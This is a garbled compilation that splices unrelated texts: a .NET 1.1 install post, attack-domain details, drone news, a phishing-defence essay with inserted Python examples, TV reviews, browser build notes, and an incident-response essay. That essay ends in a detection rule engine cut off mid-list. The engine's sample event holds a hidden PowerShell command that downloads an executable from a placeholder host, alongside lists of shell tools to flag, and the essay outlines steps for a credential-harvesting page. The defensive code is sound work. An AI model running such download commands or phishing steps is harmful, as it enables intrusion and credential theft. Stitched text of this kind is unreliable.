Yes, I know this is crazy but… I don’t know if anyone else would care. Windows 10 (7 & 8 as well, I guess…) include a .NET 2.0 option or a 3.5 which includes 2.0 install but if you need the first real ‘release’ version of .NET v1.1 you cannot install it. And some applications were pretty much hard coded to 1.1, even though the whole point of .NET was to avoid this kind of version/DLL hell.
Well I had come across this great post here on techjourney.net. And yes it sounds crazy but it works!
All you need to do is download the version 1.1 framework + SP1, slipstream the SP1 patch into the directory, and run the setup:
- `dotnetfx.exe /c:"msiexec.exe /a netfx.msi TARGETDIR=C:\DotNet"`
- `dotnetfxsp1.exe /Xp:C:\DotNet\netfxsp.msp`
- Run the `netfx.msi` that was created in `C:\DotNet\`
I’ve gone ahead and combined the .NET v1.1 framework + SP1 into this zip file: dotnet1.1-withsp1.zip, so you can bypass those steps and just go. No more bizarre errors about the debugger not finding itself and crashing out the installer.
And now I can manage my nested VMware ESX 2.5.2 cluster on Windows 10 natively as managing from a VM just wasn’t the great experience I’d been hoping for.
The domain used by the attack, neweggstats.com, was hosted on a server at the Dutch hosting provider WorldStream and had a TLS certificate. The domain was registered through Namecheap on August 13, using a registration privacy protection company in Panama. The domain's TLS certificate was purchased through Comodo on the same day. The Comodo certificate was likely the most expensive part of the attackers' infrastructure.
The US Air Force has revealed that an MQ-9 Reaper uncrewed aircraft successfully shot down a smaller drone with a heat-seeking air-to-air missile in a test last November. The details, provided by Col. Julian Cheater, commander of the 432nd Wing, came in an interview with Military.com at the Air Force Association's Air, Space, and Cyber Conference in Washington, DC, yesterday.
The Air Force's Air Combat Command has been exploring ways to arm the MQ-9 with air-to-air weapons since 2003. That was when the Air Force was preparing to issue a contract to General Atomics for the uncrewed aircraft, which was known at the time as the Predator-B. Much of the problem has been that the MQ-9, which is flown over a satellite communications link by Air Force operators, lacks the kind of sensors a fighter aircraft would use to track and target other aircraft. Its Lynx multimode radar is a synthetic aperture radar intended for tracking surface targets on land and sea and for providing ground imaging—but not for searching for other aircraft. Its other sensors (other than navigational cameras) were intended for tracking things below as well. And the MQ-9 lacks the sort of electronic-warfare sensors and countermeasures of crewed combat aircraft.
However, the Reaper's Multispectral Targeting System (MTS) has proven to be usable for tracking some types of flying targets. In 2016, the latest version of MTS, the MTS-C, successfully tracked missile launches in a test conducted by the Missile Defense Agency. The MTS-C added long-wave infrared to the short and medium infrared wavelength sensors used in previous versions, allowing the sensor to track "cold body" objects.
Mysterious hooded computer guys doing mysterious hooded computer guy .. things! Who knows what kind of naughty digital mischief they might be up to?
Unfortunately, we now live in a world where this kind of digital mischief is literally rewriting the world's history. For proof of that, you need look no further than this single email that was sent March 19th, 2016.
If you don't recognize what this is, it is a phishing email.
This is by now a very, very famous phishing email, arguably the most famous of all time. But let's consider how this email even got sent to its target in the first place:
An attacker slurped up lists of any public emails of 2008 political campaign staffers.
One 2008 staffer was also hired for the 2016 political campaign
That particular staffer had non-public campaign emails in their address book, and one of them was a powerful key campaign member with an extensive email history.
One successful phish leads to an even wider address-book attack net down the line. Once they gain access to a person's inbox, they use it to prepare their next attack. They'll harvest existing email addresses, subject lines, content, and attachments to construct plausible-looking boobytrapped emails and mail them to all of their contacts. How sophisticated and targeted to a particular person this effort is determines whether it's so-called "spear" phishing or not.
In this case it was not at all targeted. This is a remarkably unsophisticated, absolutely generic routine phishing attack. There is zero focused attack effort on display here. But note the target did not immediately click the link in the email!
Instead, he did exactly what you'd want a person to do in this scenario: he emailed IT support and asked if this email was valid. But IT made a fatal mistake in their response.
Do you see it? Here's the kicker:
Mr. Delavan, in an interview, said that his bad advice was a result of a typo: He knew this was a phishing attack, as the campaign was getting dozens of them. He said he had meant to type that it was an “illegitimate” email, an error that he said has plagued him ever since.
One word. He got one word wrong. But what a word to get wrong, and in the first sentence! The email did provide the proper Google address to reset your password. But the lede was already buried since the first sentence said "legitimate"; the phishing link in that email was then clicked. And the rest is literally history.
What's even funnier (well, in the way of gallows humor, I guess) is that public stats were left enabled for that bit.ly tracking link, so you can see exactly what crazy domain that "Google login page" resolved to, and that it was clicked exactly twice, on the same day it was mailed.
As I said, these were not exactly sophisticated attackers. So yeah, in theory an attentive user could pay attention to the browser's address bar and notice that after clicking the link, they arrived at
Note that the phishing URL is carefully constructed so the most "correct" part is at the front, and weirdness is sandwiched in the middle. Unless you're paying very close attention and your address bar is long enough to expose the full URL, it's … tricky. See this 10 second video for a dramatic example.
Quick phishing demo. Would you fall for something like this? pic.twitter.com/phONMKHBle — Mustafa Al-Bassam (@musalbas), September 9, 2018
(And if you think that one's good, check out this one. Don't forget all the unicode look-alike trickery you can pull, too.)
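The address-bar trick described above is hard to catch by eye, so here is a small inspector, added here as an example and not part of the original post, that pulls out the things a glance at the left end of a long URL hides: the host the browser will actually connect to, the (approximate) registrable domain, userinfo before an `@`, punycode labels, and mixed Unicode scripts of the kind used for look-alike tricks. The brand token list and all URLs are constructed for the example; the "last two labels" rule for the registrable domain is a simplification that a real check would replace with the Public Suffix List.

```python
import unicodedata
from urllib.parse import urlsplit

# Brand tokens a reviewer might look for inside a host. Constructed for this
# example; not a real allow or deny list.
BRAND_TOKENS = {"google", "paypal", "apple", "microsoft"}


def registrable_domain(host):
    """Approximate the registrable domain as the last two labels.

    Simplification (assumption): a production check needs the Public Suffix
    List so that hosts such as 'example.co.uk' are handled correctly.
    """
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def scripts_in(host):
    """Set of Unicode scripts (LATIN, CYRILLIC, ...) used by the letters of host."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in host if ch.isalpha()}


def inspect_url(url):
    """Return (effective host, registrable domain, list of warnings) for a URL."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    warnings = []

    # Anything before '@' is userinfo, not the host, however host-like it looks.
    if parts.username is not None:
        warnings.append("userinfo before '@': text left of '@' is not the host")

    # A brand name that appears only in subdomain labels is under the
    # registrant's control and says nothing about who owns the site.
    reg = registrable_domain(host)
    left_of_domain = host[: -len(reg)].rstrip(".") if host.endswith(reg) else ""
    for token in sorted(BRAND_TOKENS):
        if token in left_of_domain.split(".") and token not in reg:
            warnings.append(f"brand '{token}' appears only in a subdomain of {reg}")

    # Internationalized labels reach the resolver as punycode ('xn--...').
    if any(label.startswith("xn--") for label in host.split(".")):
        warnings.append("punycode label: host is an IDN and may render as look-alikes")

    # Letters from more than one script in one host is the classic homograph shape.
    scripts = scripts_in(host)
    if len(scripts) > 1:
        ascii_host = host.encode("idna").decode("ascii")
        warnings.append(f"mixed scripts {sorted(scripts)}: resolved as {ascii_host}")

    return host, reg, warnings


if __name__ == "__main__":
    for sample in (
        "https://accounts.google.com.secure-login.example/ServiceLogin",  # constructed
        "https://\u0430pple.example/",                                    # Cyrillic 'а'
        "https://accounts.google.com@evil.example/",                       # constructed
        "https://www.google.com/",
    ):
        print(inspect_url(sample))
```

The host and registrable domain are what to compare against the site you meant to visit; every warning line points at a part of the URL that the browser does not treat the way a reader's eye does.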
I originally wrote this post as a presentation for the Berkeley Computer Science Club back in March, and at that time I gathered a list of public phishing pages I found on the web.
Of those five examples from 6 months ago, one is completely gone, one loads just fine, and three present an appropriately scary red interstitial warning page that strongly advises you not to visit the page you're trying to visit, courtesy of Google's safe browsing API. But of course this kind of shared blacklist domain name protection will be completely useless on any fresh phishing site. (Don't even get me started on how blacklists have never really worked anyway.)
It doesn't exactly require a PhD degree in computer science to phish someone:
- Buy a crazy long, realistic looking domain name.
- Point it to a cloud server somewhere.
- Get a free HTTPS certificate courtesy of our friends at Let's Encrypt.
- Build a realistic copy of a login page that silently transmits everything you type in those login fields to you – perhaps even in real time, as the target types.
- Harvest email addresses and mass mail a plausible looking phishing email with your URL.
I want to emphasize that although clearly mistakes were made in this specific situation, none of the people involved here were amateurs. They had training and experience. They were working with IT and security professionals. Furthermore, they knew digital attacks were incoming.
The … campaign was no easy target; several former employees said the organization put particular stress on digital safety.
Work emails were protected by two-factor authentication, a technique that uses a second passcode to keep accounts secure. Most messages were deleted after 30 days and staff went through phishing drills. Security awareness even followed the campaigners into the bathroom, where someone put a picture of a toothbrush under the words: “You shouldn’t share your passwords either.”
The campaign itself used two factor auth extensively, which is why personal gmail accounts were targeted, because they were less protected.
The key takeaway here is that it's basically impossible, statistically speaking, to prevent your organization from being phished.
Or is it?
Nobody is doing better work in this space right now than Maciej Ceglowski and Tech Solidarity. Their list of basic security precautions for non-profits and journalists is pure gold and has been vetted by many industry professionals with security credentials that are actually impressive, unlike mine. Everyone should read this list very closely, point by point.
Computers, courtesy of smartphones, are now such a pervasive part of average life for average people that there is no longer any such thing as "computer security". There is only security. In other words, these are normal security practices everyone should be familiar with. Not just computer geeks. Not just political activists and politicians. Not just journalists and nonprofits.
It is a fair bit of reading, so because I know you are just as lazy as I am, and I am epically lazy, let me summarize what I view as the three important takeaways from the hard work Tech Solidarity put into these resources. These three short sentences are the 60 second summary of what you want to do, and what you want to share with others so they do, too.
1) Enable Two Factor authentication through an app, and not SMS, everywhere you can.
Logging in with only a password, no matter how long and unique you attempt to make that password, will never be enough. A password is what you know; you need to add the second factor of something you have (or something you are) to achieve significant additional security. SMS can famously be intercepted, social engineered, or SIM-jacked all too easily. If it's SMS, it's not secure, period. So install an authenticator app, and use it, at least for your most important credentials such as your email account and your bank.
Have I mentioned that Discourse added two factor authentication support in version 2.0, and our just released 2.1 adds printed backup codes, too? There are two paths forward: you can talk about the solution, or you can build the solution. I'm trying to do both to the best of my ability. Look for the 2FA auth option in your user preferences on your favorite Discourse instance. It's there for you.
(This is also a company policy at Discourse; if you work here, you 2FA everything all the time. No other login option exists.)
2) Make all your passwords 11 characters or more.
It's a long story, but anything under 11 characters is basically the same as having no password at all these days. I personally recommend at least 14 characters, maybe even 16. But this won't be a problem for you, because...
3) Use a password manager.
If you use a password manager, you can simultaneously avoid the pernicious danger of password re-use and the difficulty of coming up with unique and random passwords all the time. It is my hope in the long run that cloud based password management gets deeply built into Android, iOS, OSX, and Windows so that people don't need to run a weird melange of third party apps to achieve this essential task. Password management is foundational and should not be the province of third parties on principle, because you never outsource a core competency.
Bonus rule! For the particularly at-risk, get and use a U2F key.
In the long term, two factor through an app isn't quite secure enough due to the very real (and growing) specter of real-time phishing. Authentication apps offer timed keys that expire after a minute or two, but if the attacker can get you to type an authentication key and relay it to the target site fast enough, they can still log in as you. If you need ultimate protection, look into U2F keys.
I believe U2F support is still too immature at the moment, particularly on mobile, for this to be practical for the average person right now. But if you do happen to fall into those groups that will be under attack, you absolutely want to set up U2F keys where you can today. They're cheap, and the good news is that they literally make phishing impossible at last. Given that Google had 100% company wide success against phishing with U2F, we know this works.
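Why a relayed authenticator code works for the attacker but a relayed U2F assertion does not comes down to what the second factor is bound to. The following Python simulation is an added example, not code from the original post: it implements RFC 6238 TOTP (HMAC-SHA1 over the 30-second counter) and a stand-in for a U2F key whose signature covers the origin the browser reports. The secrets, origins and challenge are constructed; the key is modelled with HMAC rather than the per-site asymmetric key pair a real device uses, which keeps the example self-contained without changing the origin-binding property being shown.

```python
import hashlib
import hmac
import struct

# Constructed demo values. In practice the TOTP secret is provisioned once via
# a QR code and the device key never leaves the U2F token.
TOTP_SECRET = b"demo-shared-secret-not-real"
DEVICE_KEY = b"device-private-key-demo"
REAL_ORIGIN = "https://accounts.example"
PHISH_ORIGIN = "https://accounts.example.login-verify.test"  # constructed look-alike


def totp(secret, timestamp, step=30, digits=6):
    """RFC 6238 TOTP: HOTP over the time-step counter with dynamic truncation."""
    counter = struct.pack(">Q", int(timestamp) // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


def site_accepts_totp(code, now):
    """The real site accepts the code for the current step or the previous one."""
    return any(code == totp(TOTP_SECRET, now - drift) for drift in (0, 30))


def key_sign(challenge, origin):
    """Stand-in for a U2F key: the browser passes the page origin into the
    signed data, so the key only ever signs for the site the user is on."""
    data = f"{origin}|{challenge}".encode()
    return hmac.new(DEVICE_KEY, data, hashlib.sha256).hexdigest()


def site_accepts_assertion(signature, challenge):
    """The real site verifies the assertion against its own origin."""
    expected = key_sign(challenge, REAL_ORIGIN)
    return hmac.compare_digest(signature, expected)


def relay_outcome(now):
    """Model the real-time relay the post describes: the look-alike page forwards
    whatever the victim's browser produced to the real site within seconds.
    Returns (totp_relay_accepted, u2f_relay_accepted)."""
    # TOTP: the code is a bare number with no notion of where it was typed,
    # so a copy relayed five seconds later is indistinguishable from the user.
    victim_code = totp(TOTP_SECRET, now)
    totp_ok = site_accepts_totp(victim_code, now + 5)

    # U2F: the victim's browser is on PHISH_ORIGIN, so that is what gets signed;
    # the real site's check against REAL_ORIGIN fails no matter how fast the relay.
    challenge = "c0ffee-challenge-from-real-site"
    victim_assertion = key_sign(challenge, PHISH_ORIGIN)
    u2f_ok = site_accepts_assertion(victim_assertion, challenge)
    return totp_ok, u2f_ok


if __name__ == "__main__":
    print("TOTP relay accepted, U2F relay accepted:", relay_outcome(1_600_000_000))
```

The `totp` function is checked in the test against the RFC 6238 SHA-1 vector (secret `12345678901234567890`, T=59, 8 digits, expected `94287082`), so the "accepted" side of the comparison is a real TOTP, not a toy.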
In today's world, computers are now so omnipresent that there is no longer any such thing as cybersecurity, online security, or computer security – there's only security. You either have it, or you don't. If you follow and share these three rules, hopefully you too can have a modicum of security today.
September 22, 2018 Netflix will continue "Minecraft: Story Mode" project, but other Telltale projects are all effectively cancelled in the wake of mass layoffs at the company Friday.
September 21, 2018 Telltale has confirmed it will close following a round of mass layoffs. Telltale Games, the studio best known for narrative adventure titles like the Walking Dead, will soon shut down. Early reports suggested that around 90% of the studio's 250 employees have been laid off, and the company has now confirmed that it will close. An official announcement says that a "majority" of the studio's employees were let go today, leaving a small group of 25 to "fulfill the company's obligations to its board and partners" ahead of the shutdown. "It's been an incredibly difficult year for Telltale as we worked to set the company on a new course," CEO Pete Hawley says in the statement. "Unfortunately, we ran out of time trying to get there. We released some of our best content this year and received a tremendous amount of positive feedback, but ultimately, that did not translate to sales. With a heavy heart, we watch our friends leave today to spread our brand of storytelling across the games industry." According to journalist Jeffrey Grub on Twitter, staff at Telltale numbered around 250, which leaves 90% of the studio immediately without jobs. A source tells Dot Esports that the currently affected employees have been released without severance. The news appears to have hit the studio itself suddenly, as well - the last word from the official Twitter account was only three hours ago as of this post.
Read more of this story at Slashdot.
Base jumper's jump ends poorly. Luckily for him, he's still alive and talking to himself about how he voluntarily chose to be grievously injured. Nobody forced him [Fail]
If you want to visit a National Park, and don't mind crowds, Saturday is the day for you.
Via the NPS:
There are many ways to participate in National Public Lands Day.
- You can visit a national park for free.
- You can take part in a volunteer work project. If you volunteer on this day, you will receive a fee-free day coupon to be used on a future date.
- You can share your favorite outdoor activity on social media channel with the hashtag #NPSVolunteer, #FindYourPark and #NPLD!
National Public Lands Day is organized annually by the National Environmental Education Foundation, in cooperation with Department of the Interior, Department of the Army, and Department of Agriculture. The National Park Service is one of the event’s largest providers of sites and volunteers. Other participating federal agencies include the US Fish and Wildlife Service, Bureau of Land Management, Bureau of Reclamation, US Forest Service, and US Army Corps of Engineers.
Warning: Parking will be a disaster at many of our popular parks.
Point-and-click adventure games had a bit of a renaissance in the last decade, but have become harder to find ever since Telltale discovered a different formula with The Walking Dead in 2012. Luckily, indie developers are there to fill the void for folks who still like walking into a room and poking at everything they see.
Lamplight City is a new adventure game from the creator of Shardlight, and offers a unique twist on the familiar detective stories frequently used in this genre. Like old LucasArts games there's never a failure state, but that doesn't mean the main character can't mess things up for himself. It's up to you whether you prefer to play the character as a competent detective or an irredeemable screw-up, and it's pretty interesting exploring different paths to see how things turn out in both cases.
Small-Screen Stream: ‘American Vandal’ Season 2, More ‘Ozark,’ and Emmy-Nominated Series You Shouldn’t Miss
(Welcome to Small-Screen Stream, a feature where we share the best television shows streaming and where you can watch them.)
I don’t know about you, but I’ve been spending this in-between season trying to catch up on literally everything, while also falling victim to comfortable pleasures. That means: a lot of binges of new seasons, mixed with a lot of lazy-couch viewings of old familiars. What can I say–fall is fast approaching, and with it, a desire to light a candle and take in the elements, acknowledging that prestige movie season is fast upon us, as are the holidays.
For this week’s column, you’ll find a mix of freshly released seasons of shows you might already love, some suggestions for shows that won Emmys this week, and a few old-school favorites secretly hiding in the annals of Hulu.
American Vandal, Seasons 1-2
Where To Watch: Netflix
Created By: Dan Perrault, Tony Yacenda
Starring: Tyler Alvarez, Griffin Gluck, Jimmy Tatro
I love American Vandal. It’s one of the funniest things I’ve ever seen, and remains one of the most impressively dedicated mockumentaries ever committed to film. The perfect first season revolves around a large-scale penis joke, and the recently released second season goes even farther – from dick jokes to poop jokes. It’s potty humor for those of us – like me – who still find that sort of thing hilarious in a primal, stupid, inexplicable way.
Family Matters, Seasons 1-9
Where To Watch: Hulu
Created By: Thomas L. Miller, Robert L. Boyett
Starring: Jaleel White, Reginald VelJohnson, Jo Marie Payton
Did you know Hulu has a ton of old TGIF sitcoms? In the interest of brevity, I’ve only named this (and one other farther down the list), but there’s a whole lineup waiting to be delved into. I grew up on Family Matters, and as long-time citizen of Chicago, the house featured in the opening credits was part of our city’s pop culture mythology. Jaleel White made a surprise appearance in this week’s Emmy awards, which triggered a mini-rewatch of the season for me.
Ozark, Seasons 1-2
Where To Watch: Netflix
Created By: Bill Dubuque, Mark Williams
Starring: Jason Bateman, Laura Linney, Sofia Hubiltz, Skylar Gaertner, Julia Garner
I’m fresh out of cares when it comes to Jason Bateman, who tried my patience after an ill-advised New York Times interview where he failed to defend his Arrested Development cast mate Jessica Walter, who admitted she was routinely emotionally abused by her onscreen husband on that show, Jeffrey Tambor. That may seem like an inconsequential thing to bring into a description of Ozark, but if you’re like me, you may have a hard time separating your consistent disappointment in good actors and creators from the disappointing names they make for themselves in the news.
I caught up on Ozark not because I felt obligated, but out of a sort of primal investment out of my enjoyment of the first season. And because, as I like to tell myself, shows and movies are not just one person’s involvement, but a great many. And the show is pretty damn good, a Midwestern Breaking Bad about a family who relocates from Chicago to the Ozarks after their patriarch’s money-laundering scheme goes wrong. The second season dropped on Netflix in late August and I’ve been making my way through it slowly. It doesn’t reach quite the same heights as the first, but the cast is still top-notch – despite my Bateman misgivings – and if you loved what came before, you’ll love its follow-up, too.
The Catch, Seasons 1-2
Where To Watch: Hulu
Created By: Kate Atkinson, Helen Gregory, Jennifer Schuur
Starring: Mireille Enos, Peter Krause
This is one of those shows I tuned into solely because I love the two leads from past performances. Enos and Krause are staples in my television-loving household, and they have fun in this show, which only lasted two seasons before it was canceled last year. I can’t exactly argue with the decision to axe it, but I’ve enjoyed the first two outings. Enos plays Alice, who runs a private investigation firm in L.A., and Krause plays her con artist fiancee. It feels like low-grade Shonda Rhimes fare, but their chemistry is great, and it bumbles along enough to earn its place as a Sunday-evening easy watch.
Atypical, Seasons 1-2
Where To Watch: Netflix
Created By: Robia Rashid
Starring: Jennifer Jason Leigh, Keir Gilchrist, Brigette Lundy-Paine, Michael Rapaport
I hadn’t heard of Atypical until Netflix recommended it, and I’m so glad it did, because this is a truly special little series, about an autistic teen named Sam Gardner (Keir Gilchrist) who is looking for love, and the family around him who struggle with finding meaning beyond his diagnosis. The show was rightfully criticized in season one for its lack of proper representation in not featuring any real-life autistic actors, but it amended that in season two. It’s always a delight to see more Jennifer Jason Leigh, who shines here as Sam’s mother, a woman trying to find her place in Sam’s life while steering her own path.
Black Sails, Seasons 1-4
Where To Watch: Hulu
Created By: Jonathan E. Steinberg, Robert Levine
Starring: Toby Stephens, Hannah New, Luke Arnold, Jessica Parker Kennedy, Tom Hopper
Several of my dearest friends have been pestering me to watch Black Sails for the last few months. Knowing that I love Game of Thrones, they promised me this was an even more assured show in a similar vein, about pirates and renegades and scoundrels; AKA my exact cup of tea. I’m very early in my Black Sails viewing party, but I’m here to report that they weren’t lying. The show lacks Thrones’ fantasy stylings, but makes up for it in gritty character work. It works as a prequel to Robert Louis Stevenson’s seminal novel Treasure Island, following characters like John Silver (Luke Arnold) and Captain Flint (Toby Stephens) as they embark on new adventures.
The post Small-Screen Stream: ‘American Vandal’ Season 2, More ‘Ozark,’ and Emmy-Nominated Series You Shouldn’t Miss appeared first on /Film.
As deadly as it might be, the Bush Viper is one of the cutest animals in the world. (Source: https://ift.tt/2OwEDUU)
A brass plaque dedicated to a convicted cannibal hangs in the National Press Club, and that's not even the craziest part of the story [Weird]
Medical infusion pumps, which deliver medications to patients, are archetypal examples of the expanding threat surface being delivered by connected devices. Connecting these pumps to clinical systems can improve healthcare delivery, but if not properly secured could endanger the patient and expose the health delivery organization (HDO) infrastructure to intrusion.
Verizon officials were contrite and apologetic during a California State Assembly committee hearing that was convened Friday to examine mobile Internet throttling experienced by firefighters during recent blazes.
"We all make mistakes from time to time, the true measure of leadership is how soon we admit it, own it," Rudy Reyes told the Select Committee on Natural Disaster, Response, Recovery, and Rebuilding after reading from a statement that the company released hours earlier.
In that statement, Verizon said it would be introducing a "new plan" with truly unlimited data and "priority access" for first responders nationwide.
Vulnerabilities in smart electric plugs give attackers a staging point for scanning and attacking your whole network
If an attacker takes control of a device inside your network -- by exploiting a defect in it or a mistake you made in configuring it or by tricking you somehow -- then they can do all kinds of bad things, like scanning your local network for other vulnerable devices, attacking them and taking control over them. (more…)
A new study suggests trying too hard at work is bad for your career, so maybe it is OK to go in and half-ass it each day after all [Interesting]
PM28XP pre-release build:
Official repo changes since my last build:
- [PALEMOON] [frontend vs backend] Implemented "originPrincipal" and "triggeringPrincipal" (8d42d5cad)
- Merge pull request #680 from janekptacijarabaci/pm_principal_origin-triggering_1 (43cebecad)
- Remove dead WebApps code. (017cb0351)
- Remove dead Help Viewer skin mapping from Toolkit (68198c587)
- Enable d3d9 accelerated layers as a fallback. (f7b00e782)
- Merge pull request #681 from JustOff/PR_remove_helpviewer_skin (a92253e8d)
- Disable battery API by default to reduce private data exposure to the web (66d949a32)
- Tune the network stack (b450f90cd)
- Merge pull request #685 from trav90/default-pref-updates (ddb2b9768)
- Bug 1335296 - Expand about:support WebGL information (e7f7100ba)
- Bug 1341957 - Add webgl.getSupportedExtensions() to about:support (d84ee90be)
- Version bump (d66259dc9)
- Update HSTS preload list (e79f2ee69)
- Merge pull request #688 from janekptacijarabaci/about-support_WebGL-information_expand_1 (f8761cf8c)
- Fix theme/os mismatch with full screen/private browsing caption buttons on Macintosh (803dfd7b1)
- Link to developer site from readme. (f1f409190)
* This build is beyond official 27.9.4 build.
32bit SSE https://o.rthost.cf/palemoon/palemoon-27.9.1a1.win32-git-20180804-065137b07-xpmod-sse.7z
32bit noSSE https://o.rthost.cf/palemoon/palemoon-27.9.1a1.win32-git-20180804-065137b07-xpmod-ia32.7z
source repo: https://github.com/roytam1/palemoon27
repo changes since my last build:
- import changes from tenfourfox: Bug 1397811, Bug 1411458, Bug 1406750, Bug 1347639, Bug 1371908, Bug 1357711 (065137b07)
New regular/weekly KM-Goanna release:
* switched Goanna repo to https://github.com/roytam1/palemoon27
* update Goanna3 to git 1e0176c7d...065137b07:
- import changes from tenfourfox: Bug 1397811, Bug 1411458, Bug 1406750, Bug 1347639, Bug 1371908, Bug 1357711 (065137b07)
* Notice: the changelog above may not always be applicable to the XULRunner code which K-Meleon uses.
When I started in the industry, there were no real training courses or programs available, and IR business models pretty much required (and still do) that a new analyst is out on the road as soon as they're hired. I got started in the industry and developed some skills, had some training (initial EnCase training in '99), and when I got to a consulting position, I was extremely fortunate to have a boss who took an interest in mentoring me and providing guidance, which I greatly appreciate to this day.
However, I've seen this same issue with business models as recently as 2018. New candidates for IR teams are interviewed, and once they're hired and go through the corporate on-boarding, there is little if any facility for training or supervising...the analysts are left to themselves. Yes, they are provided with tools, software products, and report templates, but for the most part, that's it. How are they communicating with clients? Are they sending in regular updates? If so, are those updates appropriate, and more importantly, are they technically correct? Are the analysts maintaining case notes?
Over the years of doing IR work, I ran into the usual issues that most of us see...like trying to find physical systems in a data center by accessing the system remotely and opening the CD-ROM tray. But two things kept popping into my mind; one was, I really wished that there was a way to get a broader view of what was happening during an incident. Rather than the client sending me the systems that they thought were involved or the "key" systems, what if I could get a wider view of the incident? This was very evident when there were indications on the systems I was examining that pointed to them being accessed from other systems, or accessing other systems, on the same infrastructure.
The other was that I was spending a lot of time looking at what was left behind after a process ran. I hadn't seen BigFoot tromp across the field, because due to the nature of IR, all I had to look at were footprints that were several days old. What if, instead of telling the client that there were gaps in the data available for analysis (because I'm not going to guess or speculate...) I actually had a recording of the process command lines?
During one particularly fascinating engagement, it turned out that the client had installed a monitoring program on two of the affected systems. The program was one of those applications that parents use to monitor their kid's computers, and what the client provided was 3-frame-per-second videos of what went on. As such, I just accessed the folder, found all of the frames with command prompts open, and could see exactly what the adversary typed in at the prompt. I then went back and watched the videos to see what the adversary was doing via the browser, as well as via other GUI applications.
How useful are process command lines? Right now, there are considerable artifacts on systems that give analysts a view into what programs were run on a system, but not how they were run. For instance, during an engagement where we had established process creation monitoring across the enterprise, an alert was triggered on the use of rar.exe, which is very often used as a means of staging files for exfiltration. The alert was not for "rar.exe", as the file had been renamed, but was instead for the command line options that had been used, and as such, we had the password used to encrypt the archives. When we received the image from the system and recovered the archives (they'd been deleted after exfil), we were able to open the archives and show the client exactly what was taken.
So, things have progressed quite a bit over the years, while some things remain the same. While there have been significant in-roads made into establishing enterprise-wide visibility, the increase of device types (Windows, Mac, Linux, IoT, mobile, etc.) still requires us to have the ability to go out and get (or receive) individual devices or systems for collection and analysis; those skills will always be required. As such, if the business model isn't changed in some meaningful way, we are going to continue to have instances where someone without the appropriate skill sets is sent out on their own.
The next step in the evolution of IR is MDR, which does more than just mash MSS and IR together. What I mean by that is that the typical MSS functionality receives an alert, enriches it somehow, and sends the client a ticket (email, text, etc.). This then requires that the client receive and understand the message, and figure out how they need to respond...or that they call someone to get them to respond. While this is happening, the adversary is embedding themselves deeply within the infrastructure...in the words of Jesse Ventura from the original Predator movie, "...like an Alabama tick."
Okay, so what do you do? Well, if you're going to have enterprise-wide visibility, how about adding enterprise-wide response and remediation? If we're able to monitor process command lines, what if we could specify conditions that are known pretty universally to be "bad", and stop the processes? For example, every day, hundreds of thousands of us log into our computers, open Outlook, check our email, and read attachments. This is all normal. What isn't normal is when that Word document that arrived as an email attachment "opens" a command prompt and downloads a file to the system (as a result of an embedded macro). If it isn't normal and it isn't supposed to happen and we know it's bad, why not automatically block it? Why not respond at software speeds, rather than waiting for the detection to get back to the SOC, for an analyst to review it, for the analyst to send a ticket, and for the client to receive the ticket, then open it, read it, and figure out what to do about it? In that time, your infrastructure could be hit by a dedicated adversary, or by ransomware.
If you stop the download from occurring, you prevent all sorts of bad follow-on things from happening, like having to report a "personal data breach", per GDPR.
Of course, the next step would be to automatically isolate the system on the network. Yes, I completely understand that if someone's trying to do work and they can't communicate off of their own system, it's going to hamper or even halt their workflow. But if that were the case, why did they say, "Yes, I think I will 'enable content', thank you very much!", after the phishing training showed them why they shouldn't do that? I get that it's a pain in the hind end, but which is worse...enterprise-wide ransomware that not only shuts everything down but requires you to report under GDPR, or one person having to get a new computer to get work done?
So, the overall point I'm trying to make here is that the future of IR is going to be to detect and respond faster. Faster than we have been. Get ahead of the adversary, get inside their OODA loop, and cycle through the decision process faster than they can respond. I've seen this in action...the military has things called "immediate actions", which are actions that you perform immediately when a condition is met. In the military, you train on these things until they're automatic muscle memory, so that when those things occur (say, your rifle jams), you perform the actions immediately. We can apply these sorts of things to the OODA loop by removing the need to make decisions under duress, because we made them ahead of time; we made the decision regarding a specific action while we had the time to think about it, so that we didn't have to try to make the decision during an incident.
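To make the "decide it ahead of time" idea concrete, here is a small rule engine written for this post (added example, not code from the original article or from any product it describes). It evaluates process-creation events shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the sample events are constructed, and the "block"/"alert"/"allow" outcomes are the pre-decided immediate actions for the Office-spawns-a-shell-and-downloads case discussed above.

```python
"""Toy 'immediate action' rule engine over constructed process-creation events."""
import ntpath

# Office applications that, in normal use, should never be spawning a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Command interpreters / script hosts commonly launched by malicious macros.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Substrings in a child command line that indicate a network download.
DOWNLOAD_MARKERS = ("http://", "https://", "downloadstring", "downloadfile",
                    "invoke-webrequest", "urlcache", "bitstransfer")


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def decide(event: dict) -> str:
    """Return the pre-decided action for one process-creation event.

    'block' : Office parent + shell child + download indicator in the command line
    'alert' : Office parent + shell child, no download seen (needs an analyst)
    'allow' : everything else
    """
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return "allow"
    cmdline = event.get("CommandLine", "").lower()
    if any(marker in cmdline for marker in DOWNLOAD_MARKERS):
        return "block"
    return "alert"


def triage(events):
    """Apply decide() to every event; return (action, event) pairs that are not 'allow'."""
    return [(decide(e), e) for e in events if decide(e) != "allow"]


# Constructed sample events (not real telemetry); example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": "OUTLOOK.EXE"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell -w hidden Invoke-WebRequest http://example.invalid/a -OutFile %TEMP%\a.exe"},
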